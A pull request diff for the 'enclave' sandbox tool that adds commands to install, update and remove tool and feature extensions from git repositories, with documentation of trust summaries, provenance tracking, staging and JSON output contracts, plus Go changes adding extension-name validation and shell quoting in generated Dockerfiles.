### PR TITLE
feat: install tools and features from git repositories

### DIFF
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -18,7 +18,7 @@ Read `README.md` before making user-facing changes.
 
 ## External Integrations
 
-- Treat CLI JSON schemas, background-run output, lifecycle commands, container naming, and managed tmux behavior as integration contracts for external consumers; coordinate breaking changes.
+- Treat CLI JSON schemas, background-run output, lifecycle commands, container naming, and managed tmux behavior as integration contracts for external consumers; coordinate breaking changes. This includes `enclave tools|features list --json` and the shared `add`/`update`/`remove` result envelope (both `schemaVersion: "1"`; see `docs/extensions/installing.md`).
 - Prefer structured CLI output over Docker labels or human-readable output for integration contracts.
 
 ## Build and Test
@@ -77,6 +77,7 @@ Do not push, publish releases, or modify remote issues/PRs unless the maintainer
 - Full host config overrides use `~/.config/enclave/tools/<tool>/` globally and `~/.config/enclave/projects/<hash>/<tool>/config/` per project.
 - JSON/TOML patches mirror native paths under `~/.config/enclave/patches/<tool>/` globally and `~/.config/enclave/projects/<hash>/patches/<tool>/` per project.
 - Shared skills use `~/.config/enclave/skills/<skill>/` globally and `~/.config/enclave/projects/<hash>/skills/<skill>/` per project; tool-specific skills use the canonical tool config roots at the native skills path. Enabled features contribute their `skills/` between tool-extension skills and the shared sources; see `docs/configuration.md` for the full precedence order.
+- Extensions can be installed from a git repository with `enclave features|tools add`; provenance lives in `.enclave-source.json` in the installed extension directory and is excluded from the build context and image hash. See `docs/extensions/installing.md`.
 
 ## Host Data
 

--- a/README.md
+++ b/README.md
@@ -256,6 +256,7 @@ in both `host/` and `session/`, the host command wins.
 | Windows (WSL2) | [docs/windows.md](docs/windows.md) |
 | Architecture | [docs/ARCHITECTURE.md](docs/ARCHITECTURE.md) |
 | Extensions | [docs/extensions/README.md](docs/extensions/README.md) |
+| Installing Extensions from Git | [docs/extensions/installing.md](docs/extensions/installing.md) |
 | Security | [docs/security/README.md](docs/security/README.md) |
 
 Project resources: [website](https://enclave.eclipse.dev),

--- a/docs/ARCHITECTURE.md
+++ b/docs/ARCHITECTURE.md
@@ -104,6 +104,7 @@ The restricted network request flow has a separate
 - [`internal/app/cleanup.go`](../internal/app/cleanup.go) implements `enclave cleanup` (persistent stores, caches, history, and agent memory).
 - [`internal/app/ssh.go`](../internal/app/ssh.go) implements `enclave ssh-init`.
 - [`internal/app/tools.go`](../internal/app/tools.go) lists available tool profiles.
+- [`internal/extinstall/`](../internal/extinstall/) installs, updates, and removes tool/feature extensions from git repositories into the user-global extension root, backing `enclave tools|features add|update|remove`.
 - [`internal/app/network_cmd.go`](../internal/app/network_cmd.go) implements `enclave network` subcommands (status, print, diff, apply, add-domain, remove-domain, set-mode).
 - [`internal/cli/network_command.go`](../internal/cli/network_command.go) defines Cobra command structure and flag parsing for the `network` subcommand tree.
 

--- a/docs/cli-reference.md
+++ b/docs/cli-reference.md
@@ -77,11 +77,24 @@ of being treated as "no argument".
 |---------|-------------|
 | `enclave info` | Show configuration and image details |
 | `enclave config` | Show configuration values |
-| `enclave tools` | List available tool profiles |
-| `enclave features` | List available feature extensions |
+| `enclave tools` | List available tool profiles (`list\|add\|remove\|update` manage installed tool extensions; see below) |
+| `enclave features` | List available feature extensions (`list\|add\|remove\|update` manage installed feature extensions; see below) |
 | `enclave completion <shell>` | Generate shell completion |
 
 `enclave config` flags: `--view <mode>` selects the output view — `matrix` (default), `source` (where each value comes from), `diff` (values overridden by higher precedence), or `effective` (effective values only); `--json` emits JSON output.
+
+### Extensions
+
+`enclave tools` and `enclave features` (bare) are aliases for their `list` subcommand. Every verb below exists for both `enclave tools <verb>` and `enclave features <verb>`; see [Installing Extensions](extensions/installing.md) for the full behavior.
+
+| Command | Flags |
+|---------|-------|
+| `list` | `--json` (machine-readable output) |
+| `add <source>` | `--path <dir>`, `--ref <ref>`, `--name <name>` (repeatable), `--all`, `--yes`/`-y`, `--force`, `--dry-run`, `--json` (requires `--yes`) |
+| `update [<name>...]` | `--ref <ref>` (single extension only), `--yes`/`-y`, `--force`, `--dry-run`, `--json` (requires `--yes`) |
+| `remove <name>...` | `--yes`/`-y`, `--force`, `--json` (requires `--yes`) |
+
+`enclave features update`/`enclave tools update` refresh installed extension **sources**; they are unrelated to the top-level `enclave update`, which rebuilds container **images**.
 
 ### IDE
 

--- a/docs/configuration.md
+++ b/docs/configuration.md
@@ -10,6 +10,12 @@ Project overrides live outside the worktree so a project cannot alter its own
 isolation policy. Extension files are discovered from built-in `extensions/`
 plus user-global `~/.config/enclave/extensions/`.
 
+Extensions installed with `enclave tools|features add` carry a
+`.enclave-source.json` provenance sidecar in their user-global directory.
+Editing an installed extension's files by hand blocks
+`enclave tools|features update` for that extension until `--force`. See
+[Installing Extensions](extensions/installing.md).
+
 The `~/.config/enclave/` paths shown throughout this document are the Linux
 (XDG) config root. On macOS the config root is
 `~/Library/Application Support/org.eclipse.enclave/config/` instead;

--- a/docs/extensions/README.md
+++ b/docs/extensions/README.md
@@ -24,8 +24,10 @@ Extension definitions are loaded from:
 2. User-global overrides under `~/.config/enclave/extensions/`
 
 Project-local extension definitions (for example,
-`/path/to/project/.enclave/extensions/`) are not loaded. Install custom
-definitions in the user-global root. Select a custom tool for a project with
+`/path/to/project/.enclave/extensions/`) are not loaded. Install extensions
+into the user-global root from a git repository with `enclave features add`
+/ `enclave tools add`; see [Installing Extensions](installing.md). Select a
+custom tool for a project with
 `enclave --tool <tool>`; project config cannot set the active tool, although
 global config can set a host-wide default. For a project-specific feature,
 declare it with `defaultEnabled: false` (to avoid the project-specific

--- a/docs/extensions/installing.md
+++ b/docs/extensions/installing.md
@@ -1,0 +1,315 @@
+# Installing Extensions from Git
+
+`enclave tools` and `enclave features` install, update, and remove extensions
+from git repositories into the user-global extension root
+(`~/.config/enclave/extensions/`). This document covers that installer; see
+[Extension Architecture](README.md) for the spec format itself.
+
+## Commands
+
+| Command | Description |
+|---------|-------------|
+| `enclave features list` / `enclave tools list` | List extensions (built-in and installed), with source and provenance |
+| `enclave features add <source>` / `enclave tools add <source>` | Install an extension from a git repository |
+| `enclave features update [<name>...]` / `enclave tools update [<name>...]` | Refresh installed extensions from their recorded source |
+| `enclave features remove <name>...` / `enclave tools remove <name>...` | Remove installed extensions |
+
+`enclave features` and `enclave tools` with no subcommand are aliases for
+`list`. `enclave features update`/`enclave tools update` refresh extension
+**sources** on the host; they do not touch images. The unrelated top-level
+`enclave update` rebuilds container **images** from whatever extensions are
+currently on disk. Installing or updating an extension changes its content
+hash, which is what actually triggers a rebuild on the next run.
+
+## Sources
+
+| Form | Example |
+|------|---------|
+| `owner/repo` shorthand | `acme/kits` (assumes `https://github.com`) |
+| shorthand with subpath | `acme/kits/extensions/features/github-cli` |
+| https/http/git URL | `https://gitlab.com/acme/kits` |
+| forge tree URL | `https://github.com/acme/kits/tree/v1.2.0/extensions/tools/foo` |
+| ssh/scp-style remote | `git@github.com:acme/kits.git`, `ssh://git@host/acme/kits.git` |
+| local path | `./my-kits`, `~/kits`, `/abs/path/to/kits` |
+
+A trailing `.git` is stripped from shorthands and plain URLs. A forge tree URL
+(`/tree/<ref>/...`, including GitLab's `/-/tree/<ref>/...`) supplies both the
+ref and the subpath; a conflicting `--ref` is rejected rather than silently
+overriding it, and a `--path` is rejected when the source string already
+names one.
+
+The `owner/repo` shorthand is exactly two segments: everything after the
+second segment is taken as the subpath. This makes it ambiguous for GitLab
+subgroups (`group/subgroup/project` would parse `subgroup` as the repo name
+and `project` as a subpath). For a nested-group repository, use the full
+clone URL instead, and pass `--path` to name the extension directory inside
+it — the escape hatch for exactly this case.
+
+## Discovery
+
+The verb fixes the kind: `enclave tools add` looks only for `kind: sandbox`
+extensions, `enclave features add` only for `kind: mixin`. With no subpath in
+the source, the whole repository (up to 8 directories deep) is scanned for
+spec documents (`spec.yaml`/`spec.json`) whose `kind` matches and whose spec
+`name` matches their containing directory's name — a mismatch, or a name the
+loader could never resolve, is reported as a skip rather than silently
+ignored. A spec at the repository root is not checked against a directory
+name (there is none); its declared `name` must still not contain a path
+separator or `..`, since nothing else stands between an untrusted spec value
+and a destination path.
+
+- Exactly one match: installed without asking.
+- Several matches, no `--name`/`--all`: listed and, interactively, confirmed
+  with a prompt; non-interactively (`--yes`/`--json`) this is an error —
+  `add` never guesses which ones you meant.
+- `--name <name>` (repeatable) installs only the named extension(s); `--all`
+  installs every match. They are mutually exclusive, and so are `--path` and
+  `--name`: one addresses a directory inside the source, the other filters
+  discovery results within it.
+- Two matched candidates in different directories that declare the *same*
+  name are a hard error naming both directories, even under `--all` — there
+  is no way to install both into the same destination directory, so you
+  disambiguate with `--path` up front rather than have one silently win.
+- If the source has extensions of the *other* kind but none of the requested
+  one, the error names the right verb (`enclave features add` when you ran
+  `enclave tools add` against a features-only repo).
+
+## Trust
+
+An extension is unreviewed code and configuration that, once installed, can
+run at container build and start time. Before writing anything, `add` and
+`update` show a capability summary distilled from the staged content itself
+(never from claims elsewhere): whether it needs root to install, runs an
+install/startup script (by count and script name, never full command text —
+this is a capability summary, not a code audit), how many `commands.install`
+steps run as root (a step with no `user` field defaults to root, independently
+of the top-level `needsRoot`), whether it ships a `check-update.sh` that enclave
+runs in a container on each automatic update check, widens the network allowlist
+or denies domains, declares credentials and where they're released as HTTP
+headers, whether it flips on the approval-bypass flag (`sandbox.yoloFlag`,
+active by default once declared), ships skills, host config/credential
+passthrough, or seeds files into your project directory. An update shows the
+same information as a diff against what's currently installed, so a newly
+granted capability is visible before you accept it.
+
+`--yes` skips the confirmation prompt after the summary is shown; it never
+skips the summary itself. `--json` implies non-interactive and requires
+`--yes` (it has no way to prompt). `--force` overrides collision policy —
+replacing an already-installed extension, one that was hand-edited, one
+enclave did not install, or **one that would shadow a built-in extension of
+the same name** — but never overrides a validation error: a spec that fails
+to load, or content that violates the [limits](#limits) below, blocks the
+install regardless of `--force`. An extension's name is one of those
+validation errors: it must match `^[a-z0-9][a-z0-9._-]*$`. The name becomes a
+directory, a build-context path, and an interpolation into the generated
+Dockerfile, so the charset is deliberately narrower than what a filesystem
+accepts. `--dry-run` performs the same fetch,
+staging, and validation as a real install and prints what would happen, but
+never touches the destination — see the identical behavior under [Update
+semantics](#update-semantics).
+
+## Provenance
+
+A successful install writes `.enclave-source.json` into the installed
+extension directory:
+
+| Field | Meaning |
+|-------|---------|
+| `remote`, `source`, `subpath` | Redacted remote URL, the source string as given (also redacted), and the repository subpath |
+| `ref`, `refType` | The requested ref and whether it is a `branch`, `tag`, or `commit` |
+| `commit` | The exact commit installed |
+| `installedAt`, `installedBy` | Install timestamp and the enclave version that performed it |
+| `treeHash` | A digest of the installed files, used to detect local edits |
+
+This sidecar is excluded from the Docker build context and from the image
+identity hash — re-pinning to a new commit with byte-identical content does
+not force a rebuild, and the sidecar never reaches the image. Such a re-pin
+therefore prints no "rebuilds the image" hint either: there is nothing for the
+next run to rebuild. A directory under the user extension root with no
+sidecar is unmanaged: it was placed there by hand (or predates the
+installer), so `update` skips it (there is no recorded source to update from,
+and `--force` does not invent one) while `remove` requires `--force`. A
+sidecar that exists but fails to parse is reported distinctly ("its
+provenance file could not be read") from a missing one ("not installed by
+enclave").
+
+An extension whose `spec.yaml` no longer loads, which an upstream
+`schemaVersion` bump is enough to cause, stays manageable: `remove` and
+`update` enumerate the directories under the extension roots rather than the
+specs that parse, so recovery never means deleting a directory by hand.
+
+Editing an installed extension's files by hand changes its tree hash. The
+next `update` detects the mismatch and refuses to overwrite your edits until
+you pass `--force`, which discards them.
+
+## Update semantics
+
+With no names, `update` targets every extension of that kind installed from
+a git source (built-ins and unmanaged directories are skipped). For each
+target:
+
+- **Commit pin, no `--ref`/`--force`**: nothing to check — a commit is
+  immutable, so an install pinned to one is already up to date with **no
+  network call at all**. (Local edits still block this path with an error
+  telling you to pass `--force`.)
+- **Branch or tag pin**: a single `git ls-remote` resolves the ref to a
+  commit. If it matches the recorded commit and there are no local edits,
+  the run prints "up to date" and stops — nothing is fetched or staged.
+- Otherwise, the new commit is fetched, staged, and validated exactly like
+  `add`; the changed-file list (added/removed/modified paths, capped with a
+  count once there are more than a handful) and the capability diff are
+  shown, and the swap happens after confirmation (or immediately under
+  `--yes`).
+
+Targets that share a remote and a ref — several extensions from one kit
+repository — are resolved and fetched once for the whole run, not once each.
+
+`--ref <ref>` moves a single named extension to a different branch, tag, or
+commit; it errors if more than one target is selected. `--dry-run` performs
+the fetch/stage/validate but writes nothing.
+
+## Staging and recovery
+
+`add` and `update` never write into the destination directly. Content is
+staged in a `.incoming-*` directory created inside the destination directory
+itself, so the final rename never crosses a filesystem boundary; only after
+staging, validation, and confirmation does the swap happen. During the swap,
+any content already at the destination is first moved aside to a
+`.replaced-*` directory, the staged directory is renamed into its place, and
+the moved-aside copy is deleted once the new content is live.
+
+Both prefixes are dot-directories: they are invisible to extension listing
+and validation, and a leftover from an interrupted run is swept away
+automatically after 24 hours.
+
+A `--dry-run` stages in the system temp directory instead, since it never
+commits and so needs neither the same-filesystem rename nor the destination
+to exist. That is what makes "writes nothing" hold on a host that has never
+installed an extension: the user extension root is not created either.
+
+`.replaced-*` is a **time-boxed recovery window, not a durable backup**. If a
+process is killed between the swap's two renames, the previous content is
+recoverable from that directory — but only until the next sweep runs; after
+24 hours it is gone for good. Waiting a day before checking is not safe.
+
+## Remove semantics
+
+`remove` only ever touches user-installed extensions:
+
+- A built-in is never removable — there is nothing to remove.
+- Removing a user extension that **overlaid** a built-in of the same name
+  reactivates the built-in; the output says so explicitly.
+- An extension enclave did not install (no readable sidecar) needs `--force`.
+- Per-project and per-tool host state — patches, persistent stores, auth —
+  is deliberately left in place. It may belong to a future reinstall, and
+  `remove` only ever removes the extension directory itself; the output
+  names what was left untouched.
+
+## Requirements
+
+`git` must be on `PATH`; there is no other transport. A fetch prefers a
+blobless, shallow, single-ref fetch (`--filter=blob:none --depth 1`) followed
+by a sparse checkout of only the directories being installed, so file content
+you don't need is never downloaded. Each stage degrades independently on a
+server that can't do better — a server that ignores or rejects the object
+filter falls back to a full shallow fetch, a checkout that can't go sparse
+falls back to a full checkout of the fetched commit, and a server that
+refuses to fetch a bare commit SHA falls back to fetching the default branch
+and checking out the pinned commit from it. None of this is negotiated by
+probing the server's git version; every step is a plain try-then-fall-back.
+Submodules are never fetched or checked out. A repository whose root is
+itself an extension is checked out in full: that extension owns the whole
+tree, so no set of directories describes it.
+
+## JSON contracts
+
+`enclave <features|tools> list --json` emits `schemaVersion: "1"` and one
+entry per extension, whether built-in or installed:
+
+```json
+{
+  "schemaVersion": "1",
+  "kind": "feature",
+  "extensions": [
+    {
+      "name": "github-cli",
+      "displayName": "GitHub CLI",
+      "description": "GitHub CLI (gh)",
+      "source": "builtin",
+      "enabled": true,
+      "managed": false
+    },
+    {
+      "name": "demo",
+      "displayName": "Demo",
+      "description": "Demo feature for documentation walkthrough",
+      "source": "user",
+      "enabled": true,
+      "managed": true,
+      "origin": {
+        "remote": "/tmp/acme-kits",
+        "source": "/tmp/acme-kits",
+        "subpath": "extensions/features/demo",
+        "ref": "main",
+        "refType": "branch",
+        "commit": "5e6a30d81a0ae3c73172c29f429ee0ba84a28597",
+        "installedAt": "2026-08-26T19:42:23Z",
+        "locallyModified": false
+      }
+    }
+  ]
+}
+```
+
+`source` is `builtin`, `user`, or `override` (a user directory shadowing a
+built-in of the same name). An entry whose sidecar exists but could not be
+read carries `originError` instead of `origin`, with `managed: false`.
+
+`add`, `update`, and `remove` share one result envelope (also
+`schemaVersion: "1"`), written to stdout as a single JSON document when
+`--json` is passed:
+
+```json
+{
+  "schemaVersion": "1",
+  "kind": "feature",
+  "results": [
+    {
+      "name": "demo",
+      "action": "installed",
+      "commit": "5e6a30d81a0ae3c73172c29f429ee0ba84a28597",
+      "path": "/home/you/.config/enclave/extensions/features/demo"
+    }
+  ]
+}
+```
+
+`action` is one of `installed`, `updated`, `unchanged`, `removed`, `skipped`,
+or `failed`; a failed entry carries `error` instead of `commit`/`path`. An
+entry's `error` never repeats its `name` (`"has local modifications; pass
+--force to discard them"`, not `"foo has local modifications…"`) — `name` is
+the identifier, so prepend it if you want a full line, which is what the
+human-facing output does. In
+`--json` mode, this document is the whole report: stdout carries nothing else,
+and the human narration (discovery listing, skip/warn lines, the capability
+summary, post-install hints) is not rendered at all rather than dumped on
+stderr — warnings appear in each result's `warnings`, and failures in its
+`error`. An error that ends the run before any extension is touched (an
+unreachable source, a rejected flag combination) is reported as a `failed`
+result with an empty `name`, so stdout is parseable unconditionally. The
+process exits non-zero if any result's `action` is `failed`,
+independent of whether other extensions in the same invocation succeeded.
+
+## Limits
+
+- Extensions install into the **user-global** root only
+  (`~/.config/enclave/extensions/`); project-local extension directories are
+  never loaded (see [Extension Sources](README.md#extension-sources)).
+- An extension is capped at 1000 files and 10 MiB of content; symlinks and
+  other non-regular files are rejected by name, as is any path that would
+  escape the destination directory.
+- A `go/` directory in an installed extension is copied but never compiled
+  in: custom hooks/handlers still require rebuilding the `enclave` binary.
+- There is no extension registry or index — every install names a git
+  repository directly — and no signature verification of fetched content;
+  trust is whatever you extend to the source you point at.

--- a/docs/extensions/installing.md
+++ b/docs/extensions/installing.md
@@ -88,12 +88,23 @@ this is a capability summary, not a code audit), how many `commands.install`
 steps run as root (a step with no `user` field defaults to root, independently
 of the top-level `needsRoot`), whether it ships a `check-update.sh` that enclave
 runs in a container on each automatic update check, widens the network allowlist
-or denies domains, declares credentials and where they're released as HTTP
-headers, whether it flips on the approval-bypass flag (`sandbox.yoloFlag`,
-active by default once declared), ships skills, host config/credential
-passthrough, or seeds files into your project directory. An update shows the
-same information as a diff against what's currently installed, so a newly
-granted capability is visible before you accept it.
+or denies domains, publishes a container port on the host, declares credentials
+and where they're released as HTTP headers, whether it flips on the
+approval-bypass flag (`sandbox.yoloFlag`, active by default once declared) or
+appends its own argv to the agent for `--continue`/`--resume`
+(`sandbox.continueArgs`/`resumeArgs`, which can carry the same flag), launches
+an IDE on your host after start (`postStart.openIDE`), ships skills, host
+config/credential passthrough, or seeds files into your project directory. An
+update shows the same information as a diff against what's currently installed,
+so a newly granted capability is visible before you accept it.
+
+The diff goes one level below the summary wherever a spec can change what an
+extension does without changing the shape of the document: `commands.install`
+and `commands.startup` are compared by their command text (not by entry count,
+and not by the author's `description`), `environment.variables` by value as well
+as by name, and a `commands.initFiles` entry by its mode and a digest of the
+content it writes. Rewriting a step, flipping a variable, or replacing a seeded
+file's content is reported even when nothing about the structure moved.
 
 `--yes` skips the confirmation prompt after the summary is shown; it never
 skips the summary itself. `--json` implies non-interactive and requires

--- a/docs/extensions/installing.md
+++ b/docs/extensions/installing.md
@@ -69,7 +69,10 @@ and a destination path.
 - Two matched candidates in different directories that declare the *same*
   name are a hard error naming both directories, even under `--all` — there
   is no way to install both into the same destination directory, so you
-  disambiguate with `--path` up front rather than have one silently win.
+  disambiguate with `--path` up front rather than have one silently win. Only
+  the names being installed are checked: `--name foo` still errors on two
+  `foo` directories, but a duplicate pair you did not ask for is not your
+  problem.
 - If the source has extensions of the *other* kind but none of the requested
   one, the error names the right verb (`enclave features add` when you ran
   `enclave tools add` against a features-only repo).
@@ -94,7 +97,17 @@ granted capability is visible before you accept it.
 
 `--yes` skips the confirmation prompt after the summary is shown; it never
 skips the summary itself. `--json` implies non-interactive and requires
-`--yes` (it has no way to prompt). `--force` overrides collision policy —
+`--yes` (it has no way to prompt).
+
+Under `--json`, git may not ask for credentials either, on the terminal or
+through an askpass program: a private HTTPS remote fails with git's own
+message rather than blocking on a question nobody sees. That covers a
+scripted `GIT_ASKPASS` too, since git offers no way to tell one from a
+dialog, so an unattended install wants a credential helper. Helpers keep
+working, and an ssh key passphrase is ssh's own prompt, which can still
+appear.
+
+`--force` overrides collision policy —
 replacing an already-installed extension, one that was hand-edited, one
 enclave did not install, or **one that would shadow a built-in extension of
 the same name** — but never overrides a validation error: a spec that fails
@@ -120,6 +133,11 @@ extension directory:
 | `commit` | The exact commit installed |
 | `installedAt`, `installedBy` | Install timestamp and the enclave version that performed it |
 | `treeHash` | A digest of the installed files, used to detect local edits |
+
+Without `--ref`, the install follows the branch the remote's HEAD names. A
+source whose HEAD names no branch — a local clone sitting on a detached HEAD —
+offers nothing to follow, so the install records a commit pin instead and
+`update` treats it as one.
 
 This sidecar is excluded from the Docker build context and from the image
 identity hash — re-pinning to a new commit with byte-identical content does

--- a/docs/extensions/installing.md
+++ b/docs/extensions/installing.md
@@ -339,7 +339,10 @@ independent of whether other extensions in the same invocation succeeded.
   never loaded (see [Extension Sources](README.md#extension-sources)).
 - An extension is capped at 1000 files and 10 MiB of content; symlinks and
   other non-regular files are rejected by name, as is any path that would
-  escape the destination directory.
+  escape the destination directory. A candidate's `spec.yaml` is the first
+  repository content read, before anything is copied, and is held to the same
+  rule plus a 1 MiB cap: a symlinked spec is reported as unusable rather than
+  followed out of the checkout.
 - A `go/` directory in an installed extension is copied but never compiled
   in: custom hooks/handlers still require rebuilding the `enclave` binary.
 - There is no extension registry or index — every install names a git

--- a/docs/extensions/installing.md
+++ b/docs/extensions/installing.md
@@ -145,6 +145,9 @@ extension directory:
 | `installedAt`, `installedBy` | Install timestamp and the enclave version that performed it |
 | `treeHash` | A digest of the installed files, used to detect local edits |
 
+`commit` is always a commit: an annotated tag records the commit it points at,
+never the tag object's own id.
+
 Without `--ref`, the install follows the branch the remote's HEAD names. A
 source whose HEAD names no branch — a local clone sitting on a detached HEAD —
 offers nothing to follow, so the install records a commit pin instead and

--- a/internal/app/app.go
+++ b/internal/app/app.go
@@ -40,6 +40,10 @@ func Run(args []string) int {
 	baseOpts := config.DefaultOptions()
 	parsed, err := cli.Parse(args, baseOpts, userCmds...)
 	if err != nil {
+		// Under --json a rejected request still owes stdout one result envelope.
+		if parsed.Action == cli.ActionExtensionManage && parsed.ExtRequest != nil {
+			return reportExtensionResults(*parsed.ExtRequest, nil, err)
+		}
 		logx.Errorf("%v", err)
 		return 1
 	}
@@ -139,6 +143,7 @@ func Run(args []string) int {
 		HasToolDefaults:  hasToolDefaults,
 		ConfigView:       parsed.ConfigView,
 		UserCommandMount: userCommandMount,
+		ExtRequest:       parsed.ExtRequest,
 	}
 	return dispatchCommand(&command)
 }

--- a/internal/app/build.go
+++ b/internal/app/build.go
@@ -172,7 +172,7 @@ func resolveHost() (model.Host, error) {
 }
 
 func prepareBuildContext(paths model.Paths, selection runtimeImageSelection) (contextDir string, cleanup func(), err error) {
-	if paths.UserExtensionsDir == "" && selection.Tools == nil && selection.Features == nil {
+	if !config.HasUserExtensions(paths) && selection.Tools == nil && selection.Features == nil {
 		return paths.AppRoot, func() {}, nil
 	}
 
@@ -343,6 +343,10 @@ func overlayFilesFromDir(files map[string]mergedExtensionFile, relPrefix string,
 		rel, err := filepath.Rel(rootDir, path)
 		if err != nil {
 			return err
+		}
+		if !d.IsDir() && rel == model.ExtensionSourceFilename {
+			// Installer provenance: never part of the image or its identity.
+			return nil
 		}
 		if skipTop != nil {
 			top := rel
@@ -745,7 +749,7 @@ func resolveFeatureInstalls(paths model.Paths, selected []string, warnConflicts 
 // which forces the feature's declarative install into the root build phase.
 func anyRootInstallUser(users []string) bool {
 	for _, u := range users {
-		if u == "0" || u == "root" {
+		if config.IsRootInstallUser(u) {
 			return true
 		}
 	}
@@ -957,7 +961,7 @@ func queueAgentUpdate(plan *agentUpdatePlan, tool string, stamp string, force bo
 }
 
 func resolveAutomaticToolUpdate(paths model.Paths, buildCfg buildConfig, home string, tool string, probe toolFingerprintProbe) automaticToolUpdateResult {
-	if _, found := config.ResolveToolFile(paths, tool, model.CheckUpdateScriptFilename); !found {
+	if _, found := config.ResolveUpdateProbe(paths, tool); !found {
 		return automaticToolUpdateResult{}
 	}
 	if probe == nil {
@@ -998,7 +1002,7 @@ func backfillMissingAgentUpdateFingerprints(plan *agentUpdatePlan, paths model.P
 		if _, ok := plan.PendingFingerprintWrites[tool]; ok {
 			continue
 		}
-		if _, found := config.ResolveToolFile(paths, tool, model.CheckUpdateScriptFilename); !found {
+		if _, found := config.ResolveUpdateProbe(paths, tool); !found {
 			continue
 		}
 		if _, ok, err := readAgentUpdateStateValue(agentUpdateFingerprintFile(stampDir, tool)); err != nil {

--- a/internal/app/build_feature_cache_test.go
+++ b/internal/app/build_feature_cache_test.go
@@ -119,7 +119,9 @@ func TestAnyRootInstallUser(t *testing.T) {
 		want  bool
 	}{
 		{nil, false},
-		{[]string{""}, false},
+		// An empty user is root, matching install-extension-commands.sh's
+		// `.user // "0"`.
+		{[]string{""}, true},
 		{[]string{"agent", "1000"}, false},
 		{[]string{"", "root"}, true},
 		{[]string{"0"}, true},

--- a/internal/app/build_test.go
+++ b/internal/app/build_test.go
@@ -494,6 +494,49 @@ func TestBuildImageUsesExplicitBuildIdentityAndBuildxCache(t *testing.T) {
 	}
 }
 
+// A host that has never installed an extension must build straight from the app
+// root rather than stage a merged context.
+func TestPrepareBuildContextUsesAppRootWithoutUserExtensions(t *testing.T) {
+	tmp := t.TempDir()
+	appRoot := filepath.Join(tmp, "app")
+	userExtensions := filepath.Join(tmp, "home", ".config", "enclave", "extensions")
+
+	writeAppFile(t, filepath.Join(appRoot, "Dockerfile"), "FROM scratch\n", 0o644)
+	writeAppFile(t, filepath.Join(appRoot, "extensions", "tools", "claude", "spec.yaml"), "schemaVersion: \"1\"\nkind: sandbox\nname: claude\n", 0o644)
+
+	// ResolvePaths populates the user extension paths whether or not the
+	// directory exists.
+	paths := model.Paths{
+		AppRoot:           appRoot,
+		ExtensionsDir:     filepath.Join(appRoot, "extensions"),
+		ToolsDir:          filepath.Join(appRoot, "extensions", "tools"),
+		FeaturesDir:       filepath.Join(appRoot, "extensions", "features"),
+		UserExtensionsDir: userExtensions,
+		UserToolsDir:      filepath.Join(userExtensions, "tools"),
+		UserFeaturesDir:   filepath.Join(userExtensions, "features"),
+	}
+	assertPathMissing(t, userExtensions)
+
+	contextDir, cleanup, err := prepareBuildContext(paths, runtimeImageSelection{})
+	if err != nil {
+		t.Fatalf("prepareBuildContext: %v", err)
+	}
+	defer cleanup()
+	if contextDir != appRoot {
+		t.Fatalf("contextDir = %q, want the app root %q: an empty user extension root must not trigger staging", contextDir, appRoot)
+	}
+
+	writeAppFile(t, filepath.Join(userExtensions, "features", "demo", "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: demo\n", 0o644)
+	stagedDir, stagedCleanup, err := prepareBuildContext(paths, runtimeImageSelection{})
+	if err != nil {
+		t.Fatalf("prepareBuildContext with user extensions: %v", err)
+	}
+	defer stagedCleanup()
+	if stagedDir == appRoot {
+		t.Fatal("expected a staged context once the user extension root exists")
+	}
+}
+
 func TestPrepareBuildContextMergesUserAndBuiltinExtensions(t *testing.T) {
 	tmp := t.TempDir()
 	appRoot := filepath.Join(tmp, "app")

--- a/internal/app/commands.go
+++ b/internal/app/commands.go
@@ -8,7 +8,9 @@
 package app
 
 import (
+	"enclave/internal/cli"
 	"enclave/internal/config"
+	"enclave/internal/extinstall"
 	"enclave/internal/logx"
 	"enclave/internal/model"
 )
@@ -18,6 +20,9 @@ type CommandInput struct {
 	Action  string
 	Options model.Options
 	Sources model.OptionSources
+	// ExtRequest is the parsed extension-management request; nil for the verbs
+	// that have none.
+	ExtRequest *extinstall.Request
 	// CLIOptions/CLISources hold the parsed CLI state before global/project/
 	// tool-override defaults are layered on. The `update` command re-resolves
 	// these per target tool so each image matches a `--tool <tool>` run.
@@ -55,11 +60,13 @@ func dispatchCommand(input *CommandInput) int {
 	case "validate-extensions":
 		return runValidateExtensions(input.Ctx)
 	case "tools":
-		return runTools(input.Ctx, input.Options, input.Sources)
+		return runTools(input.Ctx, input.ExtRequest, input.Options, input.Sources)
 	case "features":
-		return runFeatures(input.Ctx, input.Options, input.Sources)
+		return runFeatures(input.Ctx, input.ExtRequest, input.Options, input.Sources)
 	case "extension-list":
 		return runExtensionList(input.Ctx)
+	case cli.ActionExtensionManage:
+		return runExtensionManage(input.Ctx, input.ExtRequest)
 	case "update":
 		return runUpdate(input)
 	case "devcontainer-generate":

--- a/internal/app/dockerfile_gen.go
+++ b/internal/app/dockerfile_gen.go
@@ -14,6 +14,8 @@ import (
 	"sort"
 	"strings"
 
+	"enclave/internal/config"
+	"enclave/internal/logx"
 	"enclave/internal/model"
 	"enclave/internal/util"
 )
@@ -106,6 +108,13 @@ func generateFeatureInstallBlock(features []featureInstall) string {
 		if name == "" {
 			continue
 		}
+		if err := config.ValidateExtensionName(name); err != nil {
+			// The name is interpolated into a COPY path and a shell-form RUN,
+			// neither of which can quote its way out of a newline. Installed
+			// extensions are checked on the way in; a hand-placed directory is not.
+			logx.Warnf("skipping feature: %v", err)
+			continue
+		}
 		fmt.Fprintf(&b, "# feature: %s (priority %d)\n", name, feature.Priority)
 		b.WriteString("USER root\n")
 		featureSource := "extensions/features/" + name
@@ -115,11 +124,11 @@ func generateFeatureInstallBlock(features []featureInstall) string {
 		if feature.HasApt {
 			b.WriteString("RUN --mount=type=cache,id=enclave-apt-cache,target=/var/cache/apt,sharing=locked \\\n")
 			b.WriteString("    --mount=type=cache,id=enclave-apt-lib,target=/var/lib/apt,sharing=locked \\\n")
-			fmt.Fprintf(&b, "    FEATURES=%q /opt/enclave/build-scripts/install-feature-apt-packages.sh\n", name)
+			fmt.Fprintf(&b, "    FEATURES=%s /opt/enclave/build-scripts/install-feature-apt-packages.sh\n", util.ShellQuote(name))
 		}
 		if feature.HasScript {
 			if feature.NeedsRoot {
-				fmt.Fprintf(&b, "RUN FEATURES=%q \\\n", name)
+				fmt.Fprintf(&b, "RUN FEATURES=%s \\\n", util.ShellQuote(name))
 				b.WriteString("    ENCLAVE_FEATURE_PHASE=root \\\n")
 				b.WriteString("    /opt/enclave/build-scripts/run-feature-installs.sh\n")
